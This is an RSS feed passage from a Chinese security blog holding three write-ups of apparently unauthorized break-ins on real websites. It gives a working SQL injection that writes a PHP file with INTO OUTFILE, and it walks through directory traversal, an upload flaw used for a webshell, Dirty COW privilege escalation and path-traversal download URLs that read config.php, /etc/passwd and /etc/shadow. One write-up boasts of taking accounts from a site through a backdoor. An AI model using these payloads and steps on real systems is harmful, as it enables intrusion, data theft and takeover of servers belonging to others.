<div id="crayon-5d1dfd3dca8b9770505137-1" class="crayon-line"><span class="crayon-sy">$</span><span class="crayon-v">u</span> <span class="crayon-o">=</span> <span class="crayon-sy">$</span><span class="crayon-v">ob</span><span class="crayon-o">-&gt;</span><span class="crayon-e">getOneData</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">_GET</span><span class="crayon-sy">[</span><span class="crayon-s">&#8216;id&#8217;</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>id直接代入数据库查询，可尝试<code>into outfile</code></p>
<p>payload</p>
<div id="crayon-5d1dfd3dca8bb897660177" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1dfd3dca8bb897660177-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1dfd3dca8bb897660177-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//go.go/admin/admininfo.php?action=info&amp;id=-1 union select 1,2,3,4,5,6,7,8,9,10,&#8217;<span class="crayon-ta">&lt;?php</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-ta">?&gt;</span>&#8216; into outfile &#8216;E:/WWW/faka/1.php&#8217;</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="后台任意文件上传">后台任意文件上传#</h2>
<p><code>/admin/set.php</code>未对文件后缀校验</p>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca4581bbeb22.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca457c2b0c0d.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<h2 id="漏洞利用">漏洞利用#</h2>
<p>文件遍历拿到后台=&gt;<code>adminInfo.php</code>拿到管理员账户或直接登陆=&gt;任意文件上传拿shell</p>
<h1 id="实战"><a class="tag_link" title="浏览关于“实战”的文章" href="/tags/%e5%ae%9e%e6%88%98" target="_blank" rel="noopener noreferrer">实战</a>#</h1>
<p>后门进入后台，上传没有写文件权限，sql注入outfile写文件被宝塔拦截，尝试多种方法无果，放弃，毕竟账号已经有了，下东西去。</p>
<div class="post-image"><img src="https://i.loli.net/2019/04/03/5ca4598882548.png" alt="记一次由百度云会员引起的审计及渗透-ChaBug安全" data-type="image" /></div>
<p>ps:我没想到一个卖百度云账号的流水一天也能7k</p>
<h1 id="总结">总结#</h1>
<p>网站是死的，思路是活的。<a class="tag_link" title="浏览关于“渗透测试”的文章" href="/tags/%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95" target="_blank" rel="noopener noreferrer">渗透测试</a>的精髓是指哪打哪，希望我可以做到。<strong>另外如果有师傅知道怎么绕过宝塔写shell的请pm我，感激不尽。</strong>有在学代码审计的同学也欢迎找我交流哦！</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>再记由目录遍历到getshell</title>
		<link>/web/651.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 06 Jul 2019 17:17:43 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[目录遍历]]></category>
		<guid isPermaLink="false">/?p=651</guid>

					<description><![CDATA[在上一篇文章之后，大家的反应出乎我的意料，可能是因为出于某些问题，此类文章较少较小众。我希望我可以通过文章记录的形式，来将经验和思路分享给大家，也欢迎大家找我交流经验。文笔不好，如...]]></description>
										<content:encoded><![CDATA[<p>在<a href="https://y4er.com/post/pentest-03-12/" target="_blank" rel="nofollow noopener noreferrer">上一篇文章</a>之后，大家的反应出乎我的意料，可能是因为出于某些问题，此类文章较少较小众。我希望我可以通过文章记录的形式，来将经验和思路分享给大家，也欢迎大家找我交流经验。文笔不好，如有错误，欢迎斧正。</p>
<p>全文纯属虚构，如有雷同，就雷同吧。</p>
<p>目标国外站<a href="http://xxx.xx.com/" target="_blank" rel="nofollow noopener noreferrer">http://xxx.xx.com/</a></p>
<p>云悉指纹</p>
<table class="layui-table">
<tbody>
<tr>
<td>Web指纹</td>
<td>PHP/5.3.3，CentOS，Apache/2.2.15</td>
</tr>
<tr>
<td>语言</td>
<td>PHP/5.3.3</td>
</tr>
<tr>
<td>数据库</td>
<td>无</td>
</tr>
<tr>
<td>Web容器</td>
<td>Apache/2.2.15</td>
</tr>
<tr>
<td>服务器</td>
<td>无</td>
</tr>
<tr>
<td>全球排名</td>
<td>无</td>
</tr>
<tr>
<td>操作系统</td>
<td>CentOs</td>
</tr>
</tbody>
</table>
<p>ip：<code>175.117.xxx.xxx</code> 无cdn无waf</p>
<p>概览全局</p>
<p>访问直接跳转到<a href="http://xxx.xx.com/member/login.php" target="_blank" rel="nofollow noopener noreferrer">http://xxx.xx.com/member/login.php</a></p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a5813dcfb8.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a5813dcfb8.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>手动测试万能密码，尝试无果。</p>
<p>查看源代码寻找敏感路径或敏感api</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a588f7715c.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a588f7715c.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>发现敏感路径</p>
<p>访问仍然跳转到登陆界面，放弃。</p>
<p>目录有迹可循，没有加特殊前缀后缀，掏出御剑</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a7390aeca6.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a59566095a.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p><code>http://xxx.com/admin</code></p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a59cba074f.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a59cba074f.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>简陋后台，尝试万能密码，无果。</p>
<p>查看源代码，无果。(有些账号密码会写在源代码中！)</p>
<p><a href="http://xxx.com/member" target="_blank" rel="nofollow noopener noreferrer">http://xxx.com/member</a></p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a5aaf75eb3.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a5aaf75eb3.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>发现<a class="tag_link" title="浏览关于“目录遍历”的文章" href="/tags/%e7%9b%ae%e5%bd%95%e9%81%8d%e5%8e%86" target="_blank" rel="noopener noreferrer">目录遍历</a>，大部分都被重定向到登陆页面。看下御剑扫出的另外几个</p>
<p><code>xxx.com/temp/</code></p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a5b2821f65.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a5b2821f65.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p><code>http://xxx.com/html/</code> 404</p>
<p><code>http://xxx.com/data/</code> 看到这个我知道这个站死定了</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a5bb692075.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a5bb692075.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>被扫描器扫描之后创建了很多文件夹，并且时间都是最近的。很有可能后台编辑器不登陆就能用。</p>
<p>三个<span class="wpcom_tag_link"><a href="/tags/%e7%9b%ae%e5%bd%95%e9%81%8d%e5%8e%86" title="目录遍历" target="_blank">目录遍历</a></span>点，我们需要耐心找下可以利用的文件或者目录。注意留意<code>upload</code>字样的文件夹，因为很有可能会有前人的脚印。这里说一点就是如果你找到前人的马但是不知道密码，你可以尝试下载同名的图片用记事本打开。</p>
<p>测试之后总结下可能被利用的点</p>
<p><code>http://xxx.xxx/data/imagesfile/upload/</code>文件上传的目录</p>
<p><code>http://xxx.xxx/data/log/error_201511.log</code>MySQL错误日志爆出绝对路径</p>
<p><code>http://xxx.xxx/member/check_userid.php</code></p>
<p><code>http://xxx/member/message.php</code></p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a5f1a709c5.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a5f1a709c5.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>唯一没打码的黄字导航存在注入，post搜索框存在注入，无任何过滤</p>
<p><code>http://xxx/board/?bid=1</code></p>
<p>到这里我想的是root权限+绝对路径写shell，美滋滋？</p>
<p>然后sqlmap报了这个，非root，非dba，服了</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a5fd10f567.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a5fd10f567.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>那只能跑后台管理员账号密码了。。然后没找到管理员表。。。国外站就是太卡，让他先跑着，回头继续看目录遍历，我们现在的目的要转向上传点上。</p>
<p>然后我在目录遍历之中没找到上传点。服了。</p>
<h2 id="峰回路转"><i class="iconfont icon-link"></i>峰回路转</h2>
<p>在之前的注入点之中，</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a614f08a6e.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a614f08a6e.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>我忽略了一个细节，而这个细节是<strong>谷歌翻译</strong>帮助我发现的- &#8211;</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a61a6b5ee4.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a61a6b5ee4.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>这个注入点是查看帖子，那么与之相对应的右下角既是发布/创建帖子。</p>
<p>上传点</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a63c349b2f.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a63c349b2f.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a62693c968.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a62693c968.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>上传点可用</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a62da7ae51.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a62da7ae51.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>尝试<a class="tag_link" title="浏览关于“getshell”的文章" href="/tags/getshell" target="_blank" rel="noopener noreferrer">getshell</a> apache+php5.3 图片白名单 上传重命名 尝试解析漏洞和截断，无果。</p>
<p>发现编辑器还有一个上传点</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a63f5eab4f.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a63f5eab4f.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a6421b596d.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a6421b596d.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>抓包</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a64b161cfc.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a64b161cfc.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>未重命名！</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a64f301446.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a64f301446.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>apache解析漏洞<span class="wpcom_tag_link"><a href="/tags/getshell" title="getshell" target="_blank">getshell</a></span></p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a6566ca9d3.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a6566ca9d3.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>访问404？？？</p>
<p>发现不存在<code>_thumb</code>这个目录，不知道怎么回事。</p>
<p>借助之前的目录遍历找到shell</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a665ce7816.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a665ce7816.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>蚁剑</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a66a7b6f85.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a66a7b6f85.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>权限是apache，</p>
<div class="post-image"><a class="fancybox" title="再记由目录遍历到getshell" href="https://i.loli.net/2019/03/14/5c8a67bd09411.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/14/5c8a67bd09411.png" alt="再记由目录遍历到getshell-ChaBug安全" /></a></div>
<p>脏牛获取root，懒得截图了。</p>
<h2 id="写在文后"><i class="iconfont icon-link"></i>写在文后</h2>
<p>总结：扫描=》发现目录遍历=》发现注入点=》发现编辑器=》解析漏洞=》getshell=》回马枪目录遍历找到shell=》脏牛</p>
<p>这篇文章花了半个小时去复现截图写稿，但是渗透的整个过程花掉了我两天时间，期间拐过各种坑，总而言之就是自己的经验不足，不够细心，谷歌翻译这个我是真的无语。<a class="tag_link" title="浏览关于“实战”的文章" href="/tags/%e5%ae%9e%e6%88%98" target="_blank" rel="noopener noreferrer">实战</a>是最好的老师。</p>
<p>文笔不好，写的很乱，见谅。</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>记一次渗透之从后台到提权</title>
		<link>/web/650.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 06 Jul 2019 17:16:28 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[脏牛]]></category>
		<guid isPermaLink="false">/?p=650</guid>

					<description><![CDATA[某日朋友发来一个站让搞！搞搞搞！ 国外站，翻译的我尴尬证都犯了。 习惯性先发文章看看编辑器上传附件什么的。 四处上传，首先尝试编辑器处上传图片，经验告诉我越low的编辑器越好拿sh...]]></description>
										<content:encoded><![CDATA[<p>某日朋友发来一个站让搞！搞搞搞！</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b100e1fad.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b100e1fad.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>国外站，翻译的我尴尬证都犯了。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b1d0d5aec.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b1d0d5aec.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>习惯性先发文章看看编辑器上传附件什么的。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b276a91c7.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b276a91c7.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>四处上传，首先尝试编辑器处上传图片，经验告诉我越low的编辑器越好拿shell。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b30665201.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b30665201.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>我错了，白名单+上传重命名，smarteditor编辑器，各种截断尝试，突破不了。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b48334775.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b48334775.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b40e1397e.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b40e1397e.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>这编辑器无敌。随后发现另外三处均是调用此编辑器上传，暂时换思路。</p>
<p>在已经发布的文章中发现绝对路径</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed033533ff463407921" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed033533ff463407921-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed033533ff463407921-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//xxx.com/download.php?dnfile=20190228_012000_0978115.jpg&amp;file=/home/xxx/webapp/../public_html/upload_dir/board/16887879979878fa23f2.jpg</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b5d84fcc7.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b5d84fcc7.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>测试后发现<code>public_html</code>为根目录，决定挖挖注入，万一是root没降权就舒服了。</p>
<div id="crayon-5d1ed03353407733127003" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353407733127003-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353407733127003-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/?module=xx&amp;action=xx&amp;iPopNo=1&amp;seq_cd=1</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>&nbsp;</p>
<p>经过手动加sqlmap测试，发现后台存在时间盲注，由于国外站点访问不稳定的原因，遂放弃，在后期<a class="tag_link" title="浏览关于“getshell”的文章" href="/tags/getshell" target="_blank" rel="noopener noreferrer">getshell</a>之后发现用户不是<code>root</code>并且权限死得很，为之庆幸并没有在此处浪费时间。</p>
<p>到此处思路死了。编辑器<span class="wpcom_tag_link"><a href="/tags/getshell" title="getshell" target="_blank">getshell</a></span>无解，sql注入getshell卒。还有什么思路呢？</p>
<p>我们之前爆出绝对路径的url访问后发现会自动下载</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed03353409889785611" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353409889785611-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353409889785611-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//xxx.com/download.php?dnfile=20190228_012000_0978115.jpg&amp;file=/home/xxx/webapp/../public_html/upload_dir/board/16887879979878fa23f2.jpg</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<p>存在任意文件下载吗？先构造一下尝试</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed0335340b534137264" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed0335340b534137264-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed0335340b534137264-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//xxx.com/download.php?dnfile=download.php&amp;file=/home/xxx/webapp/../public_html/download.php</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b7f087df9.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b7f087df9.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>bingo！</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b83626a7e.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b83626a7e.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>存在任意文件下载，我们找下数据库配置文件</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed0335340c650853694" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed0335340c650853694-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed0335340c650853694-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//xxx.com/download.php?dnfile=config.php&amp;file=/home/xxx/webapp/../public_html/index.php</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<p>index.php一般会引入数据库的config.php</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b8d0690c3.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b8d0690c3.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>重新构造</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed0335340e680146139" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed0335340e680146139-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed0335340e680146139-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/download.php?dnfile=config.php&amp;file=/home/xxx/webapp/../public_html/../webapp/config.php</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b93038ab1.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b93038ab1.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>数据库配置get！后发现没开3306外链，思路断掉。</p>
<p>在这个时候我重新回头看这个任意文件下载，读一下敏感文件试试？</p>
<div class="highlight">
<div class="chroma ">my.cnf</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b9cfa15ed.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b9cfa15ed.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>password被注释掉，无用。</p>
<div class="highlight">
<div class="chroma language-bash">
<div id="crayon-5d1ed03353412352985698" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353412352985698-1">1</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1ed03353412352985698-2">2</div>
<div class="crayon-num" data-line="crayon-5d1ed03353412352985698-3">3</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353412352985698-1" class="crayon-line"><span class="crayon-o">/</span><span class="crayon-v">etc</span><span class="crayon-o">/</span><span class="crayon-v">passwd</span></div>
<div id="crayon-5d1ed03353412352985698-2" class="crayon-line crayon-striped-line"><span class="crayon-o">/</span><span class="crayon-v">etc</span><span class="crayon-o">/</span><span class="crayon-v">shadow</span></div>
<div id="crayon-5d1ed03353412352985698-3" class="crayon-line"><span class="crayon-o">/</span><span class="crayon-v">etc</span><span class="crayon-o">/</span><span class="crayon-v">profile</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bbc2bccfd.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bbc2bccfd.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bb24e3ecb.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bb24e3ecb.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>没发现有可用信息。</p>
<p>下载apache配置文件</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed03353413046836516" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
